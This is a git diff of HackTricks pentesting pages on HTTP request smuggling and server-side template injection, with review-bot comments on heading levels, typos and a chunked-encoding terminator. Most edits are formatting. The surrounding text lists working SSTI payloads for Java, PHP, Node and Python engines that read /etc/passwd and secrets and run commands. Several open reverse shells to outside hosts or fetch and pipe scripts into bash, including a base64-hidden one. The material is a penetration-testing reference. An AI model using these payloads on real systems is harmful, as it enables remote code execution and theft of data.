` or some similar header so the back-end knows the IP of the client.\
@@ -240,11 +241,11 @@ For discovering how is the proxy rewriting the request you need to **find a POST
In this case the next request will be appended after `search=` which is also **the parameter whose value is going to be reflected** on the response, therefore it's going to **reflect the headers of the next request**.
Note that **only the length indicated in the `Content-Length` header of the embedded request is going to be reflected**. If you use a low number, only a few bytes will be reflected, if you use a bigger number than the length of all the headers, then the embedded request will throw and error. Then, you should **start** with a **small number** and **increase** it until you see all you wanted to see.\
-Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r`. However, independently of the new line characters the values are going to be appended to the search parameter.
Finally note that in this attack we are still attacking ourselves to learn how the front-end proxy is rewriting the request.
-#### Capturing other users' requests
+### Capturing other users' requests
If you can find a POST request which is going to save the contents of one of the parameters you can append the following request as the value of that parameter in order to store the quest of the next client:
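Review bot: the edited TE.CL terminator on the `+` line, `search=\r\n0\r\n\r`, now ends in a lone `\r`. In chunked transfer coding the last chunk is `0` followed by CRLF and then a final CRLF (`0\r\n\r\n`), so the intended value is almost certainly `search=\r\n0\r\n\r\n` and the current edit reads as truncated or mis-escaped; if the markdown renderer is eating a backslash, put the string in a code span with the backslashes escaped rather than dropping a character. The identical string is edited the same way in the next hunk, so both should get the same fix. While this paragraph is being touched, the context line above it has two typos: "will throw and error" should be "will throw an error", and "store the quest of the next client" should be "store the request of the next client".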
@@ -268,9 +269,9 @@ In this case, the value of the **parameter comment** is going to be **saved insi
_One limitation with this technique is that it will generally only capture data up until the parameter delimiter that is applicable for the smuggled request. For URL-encoded form submissions, this will be the `&` character, meaning that the content that is stored from the victim user's request will end at the first `&`, which might even appear in the query string._
-Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r`. However, independently of the new line characters the values are going to be appended to the search parameter.
-#### Using HTTP request smuggling to exploit reflected XSS
+### Using HTTP request smuggling to exploit reflected XSS
If the web page is also **vulnerable to Reflected XSS**, you can abuse HTTP Request Smuggling to attack clients of the web. The exploitation of Reflected XSS from HTTP Request Smuggling have some advantages:
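Review bot: the `+` line in this hunk is a verbatim copy of the TE.CL note from the previous section and still says the request must end with `search=...` and that values "are going to be appended to the search parameter", but this section stores the captured data in the `comment` parameter (the hunk header context reads "the value of the **parameter comment** is going to be **saved inside**"). Either reword the note for the `comment` parameter or drop the duplicated paragraph; it also carries the same lone trailing `\r` flagged in the previous hunk.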
@@ -296,7 +297,7 @@ If a web is vulnerable to Reflected XSS on the User-Agent header you can use thi
\`\`\
`A=`
-#### Using HTTP request smuggling to turn an on-site redirect into an open redirect
+### Using HTTP request smuggling to turn an on-site redirect into an open redirect
Many applications perform on-site redirects from one URL to another and place the hostname from the request's `Host` header into the redirect URL. An example of this is the default behavior of Apache and IIS web servers, where a request for a folder without a trailing slash receives a redirect to the same folder including the trailing slash:
@@ -330,7 +331,7 @@ The smuggled request will trigger a redirect to the attacker's website, which wi
Here, the user's request was for a JavaScript file that was imported by a page on the web site. The attacker can fully compromise the victim user by returning their own JavaScript in the response.
-#### Using HTTP request smuggling to perform web cache poisoning
+### Using HTTP request smuggling to perform web cache poisoning
If any part of the **front-end infrastructure performs caching of content** (generally for performance reasons) the it **might be possible to poison that cache modifying the response of the server**.
@@ -360,7 +361,7 @@ Then, **after poisoning the socket**, you need to send a **GET request** to \*\*
The next time that somebody ask for `/static/include.js` the cached contents of the attackers script will be server (general XSS).
-#### Using HTTP request smuggling to perform web cache deception
+### Using HTTP request smuggling to perform web cache deception
> **What is the difference between web cache poisoning and web cache deception?**
>
@@ -381,7 +382,7 @@ In this variant, the attacker smuggles a request that returns some sensitive use
If the **poison reaches a client that was accessing some static content** like `/someimage.png` that was going to be **cached**. The contents of `/private/messages` of the victim will be cached in `/someimage.png` and the attacker will be able to steal them.\
Note that the **attacker doesn't know which static content the victim was trying to access** so probably the best way to test this is to perform the attack, wait a few seconds and **load all** the static contents and **search for the private data**.
-#### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
+### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
Have you found some HTTP Request Smuggling vulnerability and you don't know how to exploit it. Try these other method of exploitation:
@@ -389,9 +390,9 @@ Have you found some HTTP Request Smuggling vulnerability and you don't know how
[http-response-smuggling-desync.md](../http-response-smuggling-desync.md)
{% endcontent-ref %}
-### Turbo intruder scripts
+## Turbo intruder scripts
-#### CL.TE
+### CL.TE
From [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
@@ -434,7 +435,7 @@ def handleResponse(req, interesting):
table.add(req)
```
-#### TE.CL
+### TE.CL
From: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
@@ -480,13 +481,13 @@ def handleResponse(req, interesting):
table.add(req)
```
-### More info
+## More info
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
-### Tools
+## Tools
* [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
* [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
@@ -494,7 +495,7 @@ def handleResponse(req, interesting):
* [https://github.com/defparam/smuggler](https://github.com/defparam/smuggler)
* [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): This tool is a grammar-based HTTP Fuzzer useful to find weird request smuggling discrepancies.
-### References
+## References
* [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
* [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
@@ -504,6 +505,7 @@ def handleResponse(req, interesting):
* [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
* [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
+
Support HackTricks and get benefits!
@@ -519,3 +521,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
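Review bot: the two `+` lines at the end of this hunk append two empty lines after the final "Share your hacking tricks..." sentence, so the file now ends with several trailing blank lines. A single newline at end of file is enough and avoids whitespace churn in later diffs.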
diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 2d30c75c..3df7eb48 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1,4 +1,4 @@
-# SSTI (Server Side Template Injection)
+
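Review bot: this hunk replaces the H1 `# SSTI (Server Side Template Injection)` on line 1 with an empty line, so the README now opens with a blank line ahead of the HackTricks banner. Since the title is re-added as an H1 below the banner in the next hunk, delete line 1 outright instead of leaving it blank; tooling that takes the first heading as the page title otherwise sees a leading empty line.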
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## SSTI (Server Side Template Injection)
-### What is server-side template injection?
+# SSTI (Server Side Template Injection)
+
+## What is server-side template injection?
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
@@ -36,17 +37,17 @@ In the previous example **part of the template** itself is being **dynamically g
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
-### Constructing a server-side template injection attack
+## Constructing a server-side template injection attack
![](../../.gitbook/assets/ssti-methodology-diagram.png)
-#### Detect
+### Detect
As with any vulnerability, the first step towards exploitation is being able to find it. Perhaps the simplest initial approach is to try **fuzzing the template** by injecting a sequence of special characters commonly used in template expressions, such as the polyglot **`${{<%[%'"}}%\`.**\
In order to check if the server is vulnerable you should **spot the differences** between the response with **regular data** on the parameter and the **given payload**.\
If an **error is thrown** it will be quiet easy to figure out that **the server is vulnerable** and even which **engine is running**. But you could also find a vulnerable server if you were **expecting** it to **reflect** the given payload and it is **not being reflected** or if there are some **missing chars** in the response.
-**Detect - Plaintext context**
+#### Detect - Plaintext context
The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](../xss-cross-site-scripting/) vulnerability, but it's easy to differentiate if you try to set **mathematical operations** within a template expression:
@@ -58,7 +59,7 @@ ${{7*7}}
#{7*7}
```
-**Detect - Code context**
+#### Detect - Code context
In these cases the **user input** is being placed **within** a **template expression**:
@@ -71,7 +72,7 @@ The URL access that page could be similar to: `http://vulnerable-website.com/?gr
If you **change** the **`greeting`** parameter for a **different value** the **response won't contain the username**, but if you access something like: `http://vulnerable-website.com/?greeting=data.username}}hello` then, **the response will contain the username** (if the closing template expression chars were **`}}`**).\
If an **error** is thrown during these test, it will be easier to find that the server is vulnerable.
-#### Identify
+### Identify
Once you have detected the template injection potential, the next step is to identify the template engine.\
Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters.
@@ -88,9 +89,9 @@ Otherwise, you'll need to manually **test different language-specific payloads**
![](<../../.gitbook/assets/image (272).png>)
-#### Exploit
+### Exploit
-**Read**
+#### Read
The first step after finding template injection and identifying the template engine is to read the documentation. Key areas of interest are:
@@ -99,7 +100,7 @@ The first step after finding template injection and identifying the template eng
* Lists of builtin methods, functions, filters, and variables.
* Lists of extensions/plugins - some may be enabled by default.
-**Explore**
+#### Explore
Assuming no exploits have presented themselves, the next step is to **explore the environment** to find out exactly what **you have access to**. You can expect to find both **default objects** provided by the template engine, and **application-specific objects** passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.
@@ -107,13 +108,13 @@ If there's no builtin self object you're going to have to bruteforce variable na
Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.
-**Attack**
+#### **Attack**
At this point you should have a **firm idea of the attack surface available** to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.
-### Tools
+## Tools
-#### [Tplmap](https://github.com/epinna/tplmap)
+### [Tplmap](https://github.com/epinna/tplmap)
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
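Review bot: `+#### **Attack**` keeps the bold markers inside the heading while the sibling headings converted in this and the previous hunk (`#### Read`, `#### Explore`) drop them; use `#### Attack` so the headings and their generated anchors are consistent. Also, the fence directly under `### [Tplmap](...)` is tagged `python` but holds shell command lines (`python2.7 ./tplmap.py ...`), so `bash` is the right language tag.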
@@ -121,17 +122,17 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```
-### Exploits
+## Exploits
-#### Generic
+### Generic
In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
-#### Java
+### Java
-**Java - Basic injection**
+#### Java - Basic injection
```java
${7*7}
@@ -141,13 +142,13 @@ ${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
-**Java - Retrieve the system’s environment variables**
+#### Java - Retrieve the system’s environment variables
```java
${T(java.lang.System).getenv()}
```
-**Java - Retrieve /etc/passwd**
+#### Java - Retrieve /etc/passwd
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
@@ -155,7 +156,7 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
-#### FreeMarker (Java)
+### FreeMarker (Java)
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
@@ -173,7 +174,7 @@ ${"freemarker.template.utility.Execute"?new()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
-**Freemarker - Sandbox bypass**
+#### Freemarker - Sandbox bypass
⚠️ only works on Freemarker versions below 2.3.30
@@ -185,12 +186,12 @@ ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI()
${dwf.newInstance(ec,null)("id")}
```
-**More information**
+#### More information
* In FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
-#### Velocity (Java)
+### Velocity (Java)
```java
#set($str=$class.inspect("java.lang.String").type)
@@ -203,12 +204,12 @@ $str.valueOf($chr.toChars($out.read()))
#end
```
-**More information**
+#### More information
* In Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
-#### Thymeleaf (Java)
+### Thymeleaf (Java)
The typical test expression for SSTI is `${7*7}`. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:
@@ -225,7 +226,7 @@ If we take a deeper look into the documentation of the Thymeleaf template engine
#{selection.__${sel.code}__}
```
-**Vulnerable example**
+#### Vulnerable example
```markup
@@ -234,11 +235,11 @@ http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
-**More information**
+#### More information
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
-#### Spring View Manipulation (Java)
+### Spring View Manipulation (Java)
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
@@ -247,7 +248,7 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
-#### Pebble (Java)
+### Pebble (Java)
* `{{ someString.toUPPERCASE() }}`
@@ -266,7 +267,6 @@ New version of Pebble :
-
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
@@ -280,7 +280,7 @@ New version of Pebble :
.newInstance(([bytes]).toArray()) }}
```
-#### Jinjava (Java)
+### Jinjava (Java)
```java
{{'a'.toUpperCase()}} would result in 'A'
@@ -289,7 +289,7 @@ New version of Pebble :
Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
-**Jinjava - Command execution**
+#### Jinjava - Command execution
Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
@@ -303,11 +303,11 @@ Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpo
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)
-#### Hubspot - HuBL (Java)
+### Hubspot - HuBL (Java)
* `{% %}` statement delimiters
* `{{ }}` expression delimiters
@@ -336,7 +336,6 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
//It was also possible to call methods on the created object by combining the
-
{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
@@ -362,11 +361,11 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
-**More information**
+#### More information
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
-#### Expression Language - EL (Java)
+### Expression Language - EL (Java)
* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
@@ -381,7 +380,7 @@ Check the following page to learn more about the **exploitation of EL interprete
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}
-#### Smarty (PHP)
+### Smarty (PHP)
```php
{$smarty.version}
@@ -391,12 +390,12 @@ Check the following page to learn more about the **exploitation of EL interprete
{system('cat index.php')} // compatible v3
```
-**More information**
+#### More information
* In Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
-#### Twig (PHP)
+### Twig (PHP)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -423,7 +422,7 @@ Check the following page to learn more about the **exploitation of EL interprete
{{['cat$IFS/etc/passwd']|filter('system')}}
```
-**Twig - Template format**
+#### Twig - Template format
```php
$output = $twig > render (
@@ -437,12 +436,12 @@ $output = $twig > render (
);
```
-**More information**
+#### More information
* In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
-#### Jade (NodeJS)
+### Jade (NodeJS)
```javascript
- var x = root.process
@@ -455,12 +454,12 @@ $output = $twig > render (
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
-**More information**
+#### More information
* In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
-#### Handlebars (NodeJS)
+### Handlebars (NodeJS)
Path Traversal (more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
@@ -497,11 +496,11 @@ URLencoded:
%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d
```
-**More information**
+#### More information
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-#### JsRender (NodeJS)
+### JsRender (NodeJS)
| **Template** | **Description** |
| ------------ | --------------------------------------- |
@@ -512,40 +511,40 @@ URLencoded:
* \= 49
-**Client Side**
+#### Client Side
```python
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
-**Server Side**
+#### Server Side
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
-**More information**
+#### More information
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
-#### PugJs (NodeJS)
+### PugJs (NodeJS)
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
-**Example server side render**
+#### Example server side render
```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
-**More information**
+#### More information
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
-#### NUNJUCKS (NodeJS)
+### NUNJUCKS (NodeJS)
* \{{7\*7\}} = 49
* \{{foo\}} = No output
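Review bot: the fences that follow the new `#### Client Side` and `#### Server Side` headings are tagged `python` and `bash` respectively, yet both contain JsRender template expressions wrapping JavaScript; since these headings are being touched anyway, retag both fences (`javascript`, or `html` for the template) so highlighting matches the content. The `#### Example server side render` block for PugJs is already tagged `javascript` and can stay as is.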
@@ -557,11 +556,11 @@ home = pugjs.render(injected_page)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
```
-**More information**
+#### More information
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)
-#### ERB (Ruby)
+### ERB (Ruby)
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
@@ -580,11 +579,11 @@ home = pugjs.render(injected_page)
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Slim (Ruby)
+### Slim (Ruby)
* `{ 7 * 7 }`
@@ -592,11 +591,11 @@ home = pugjs.render(injected_page)
{ %x|env| }
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Python
+### Python
Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
@@ -604,7 +603,7 @@ Check out the following page to learn tricks about **arbitrary command execution
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
-#### Tornado (Python)
+### Tornado (Python)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -618,13 +617,12 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
-
{{os.system('whoami')}}
```
-**More information**
+#### More information
-#### Jinja2 (Python)
+### Jinja2 (Python)
[Official website](http://jinja.pocoo.org)
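Review bot: the `+#### More information` heading for the Tornado section is immediately followed by `+### Jinja2 (Python)` with nothing in between, so it is an empty section; either add the reference link it was meant to hold or remove the heading. Dropping the stray blank line before `{{os.system('whoami')}}` inside the fence is fine.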
@@ -648,13 +646,12 @@ Check out the following page to learn tricks about **arbitrary command execution
-
{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
-**Jinja2 - Template format**
+#### Jinja2 - Template format
```python
{% raw %}
@@ -669,7 +666,7 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
```
-**Jinja2 - Debug Statement**
+#### Jinja2 - Debug Statement
If the Debug Extension is enabled, a \`
@@ -679,19 +676,17 @@ If the Debug Extension is enabled, a \`
-
{% raw %}
{% debug %}
{% endraw %}
-
```
Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
-**Jinja2 - Dump all used classes**
+#### Jinja2 - Dump all used classes
```python
{{ [].class.base.subclasses() }}
@@ -699,7 +694,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ ''.__class__.__mro__[2].__subclasses__() }}
```
-**Jinja2 - Dump all config variables**
+#### Jinja2 - Dump all config variables
```python
{% raw %}
@@ -710,7 +705,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{% endraw %}
```
-**Jinja2 - Read remote file**
+#### Jinja2 - Read remote file
```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -720,13 +715,13 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```
-**Jinja2 - Write into remote file**
+#### Jinja2 - Write into remote file
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
-**Jinja2 - Remote Code Execution**
+#### Jinja2 - Remote Code Execution
Listen for connection
@@ -767,7 +762,6 @@ More:
-
{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
{% endraw %}
@@ -795,7 +789,7 @@ More:
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
-**Jinja2 - Filter bypass**
+#### Jinja2 - Filter bypass
```python
request.__class__
@@ -834,12 +828,12 @@ Bypassing most common filters ('.','\_','|join','\[',']','mro' and 'base') by [h
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr(
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
